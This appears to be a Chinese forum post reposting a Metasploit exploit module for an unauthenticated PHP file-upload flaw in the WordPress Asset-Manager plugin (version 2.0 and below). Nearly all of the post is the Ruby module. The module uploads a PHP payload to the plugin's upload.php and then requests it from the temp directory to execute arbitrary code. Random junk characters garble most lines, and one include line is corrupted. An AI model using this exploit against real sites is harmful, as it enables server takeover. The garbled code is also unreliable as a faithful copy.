这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。9 N: q, x0 L! C* j7 d1 `* j
l5 e/ m8 v$ r- l6 J' D##
; s. I2 i) S. m- ^- W+ R- {# ^! w. C% g# This file is part of the Metasploit Framework and may be subject to' U1 @3 y" q7 o! n- x; K$ F- R
# redistribution and commercial restrictions. Please see the Metasploit5 X) `; Q9 [, c) v6 W p) W S
# Framework web site for more information on licensing and terms of use.
0 ~; a" w2 z. c% S# c7 z3 I |' ]# http://metasploit.com/framework/! p2 a* w* V, B8 i$ u5 L$ W- i3 w
##
/ `+ P& g! g6 J, H! K/ ]$ X
( L3 z- w9 d# }) n) _) grequire 'msf/core' z) ?4 b2 ?3 d0 s: R0 o' Q
require 'msf/core/exploit/php_exe'* ^- C! V. c" [4 N) A4 o' a: b2 b: j
2 N% S: u$ T% h5 ]% i* k' J3 Iclass Metasploit3 < Msf::Exploit::Remote
" s: x& O/ M, I- X Rank = ExcellentRanking
+ C7 ^2 j6 L7 n* [. P1 O- T 2 n, @9 E5 ]$ X" o7 a8 l" s8 {
include Msf::Exploit::Remote::HttpClient
9 s9 G% G% b. z. ^* X& ` include Msf::Exploit: hpEXE/ r6 ?: s% ~6 s8 ^
' ?# R6 F! Q5 s( j; C
def initialize(info = {})
/ V3 y2 t: d# K/ o" T super(update_info(info,
8 @0 x# N( r1 d 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
3 x4 N: U( N8 B& n U 'Description' => %q{
: v) e7 r) O+ z: ^. j6 ]. b This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress! O9 p9 A1 E k+ n; s( x& z9 y* A
plugin. By abusing the upload.php file, a malicious user can upload a file to a" G: y, c, @; V$ J; o. E
temp directory without authentication, which results in arbitrary code execution.
3 h; F: X9 I& c/ c. K/ y },
% |4 [' o9 A ?; h" r: a 'Author' =>' g3 O! ]+ F8 ]5 R
[
% L/ U; t3 Y) a5 A% X7 \ 'Sammy FORGIT', # initial discovery
; K" G4 A, l3 k) x n9 |; r 'James Fitts <fitts.james[at]gmail.com>' # metasploit module
& l- d/ w. g; M- V6 K( P8 M3 U ],
0 n! G, b8 x5 u 'License' => MSF_LICENSE,
/ p% S/ @" G: j- Y% T 'References' =>
" H: r' g! c5 I% S6 { [! [* r- A" m+ J9 ]. B: T
[ 'OSVDB', '82653' ],2 X, S9 V3 u% J; O/ h
[ 'BID', '53809' ],
- `2 A3 e$ r6 e+ |, d [ 'EDB', '18993' ],8 v( T/ h% @' ~- C) }& E
[ 'URL', 'http:// www.myhack58.com /' ]
& h/ v! s5 s; D! o9 F ],
' a$ e; s( @% N8 H4 H 'Payload' =>& V8 F+ }2 a5 b3 A9 F
{! S( M, P7 |0 f0 m. G: |# |
'BadChars' => "\x00",/ `# N7 p1 r! h/ O3 S' d
},
$ I( d7 g8 @$ G 'Platform' => 'php',
' o- U `6 C3 T* h- }- E' E 'Arch' => ARCH_PHP,# k% \* K0 u* c8 j( a; C' |% h
'Targets' =>
! F [& F' _6 O/ }9 W+ E; R [2 u( x8 K$ `8 {6 W
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
2 \6 d- N8 [" N7 g# o4 A: B [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
4 j; t( _# a% ^! N+ w- i- a ],7 Z& Q' \2 n9 f5 |6 C) } G
'DefaultTarget' => 0,
) ]1 o6 l7 T0 y3 I: P, d9 g 'DisclosureDate' => 'May 26 2012'))3 b% H6 C, T, t' l5 f, c, a4 _
; ^; m& f/ F% g register_options(* Q8 j8 x3 v1 l) i- N. k2 o Q9 ~
[% l* O; a2 O: e7 e1 ^( d: O4 p
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
+ M3 t* J; o; m% y4 n9 `+ J8 J ], self.class)6 i" b8 ?% |4 @# q" H
end K( f2 `( f% J! u
1 H2 d7 J2 [* m v def exploit
3 f7 a) }8 y; z$ Q! w$ |3 m uri = target_uri.path" ^' p) }( P, d3 t7 \- S* U
uri << '/' if uri[-1,1] != '/'
5 f# i# _. j2 }5 n/ J" V+ K peer = "#{rhost}:#{rport}"
4 n, i3 @/ O4 v7 A4 I payload_name = "#{rand_text_alpha(5)}.php"1 [ w) D) ^: m$ {1 j& z7 R6 J5 H
php_payload = get_write_exec_payload(:unlink_self=>true)
) v& i- e0 e7 G$ p0 h
1 N# G) I t; |& K/ j0 [& O6 Y data = Rex::MIME::Message.new
0 k: ]! e+ A8 \$ t data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")1 B! }, `3 B% T$ w$ ^7 G! M0 t+ C
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
3 A! E( X& _# \
. ?0 d% h- L6 Z f( R print_status("#{peer} - Uploading payload #{payload_name}")3 j4 V1 D. `; m- E: j/ r
res = send_request_cgi({/ m. b* l. }4 w' k
'method' => 'POST',
' f- t$ _' ]8 a) X. M* _- ]: Q 'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",* Y/ r8 S2 R7 P- y& |
'ctype' => "multipart/form-data; boundary=#{data.bound}",
+ b" G$ b& ]4 C" e5 f6 `( v5 A' Z+ I 'data' => post_data* X0 r! p) X0 P! H/ M) ?/ u! I
})$ E# n; x+ h+ U% O* I+ j2 d
- _. V5 D" ^1 G
if not res or res.code != 200 or res.body !~ /#{payload_name}/ G/ U1 |9 ?3 k& y. t# E' I
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
+ H" W: M6 U5 Z$ R0 cend
, C# X: i* R2 @
* M; x, E. n* u; y print_status("#{peer} - Executing payload #{payload_name}")
( p$ k3 j$ x& p; e' x% k2 S res = send_request_raw({
/ Q) C) s5 p. E- v1 I2 e& n/ O 'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",: q& W- e* W1 O8 A1 t
'method' => 'GET'
' U: ]. U1 P: y2 K })
7 l2 X; E8 ?( M# ?0 ?# _0 z8 M& a
' O: q$ p# S4 {- O4 Y$ C( x if res and res.code != 200. o0 X9 C% L( E: M8 c
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")8 t' \2 R9 V; r3 C1 b. c( W8 J
end; z- s) \2 _7 p0 x) Z0 A
end
: i, s! ] W* a1 Z$ `- Kend( {3 u o# _! T
|
发表于 2012-12-31 09:22:33
收藏
支持
反对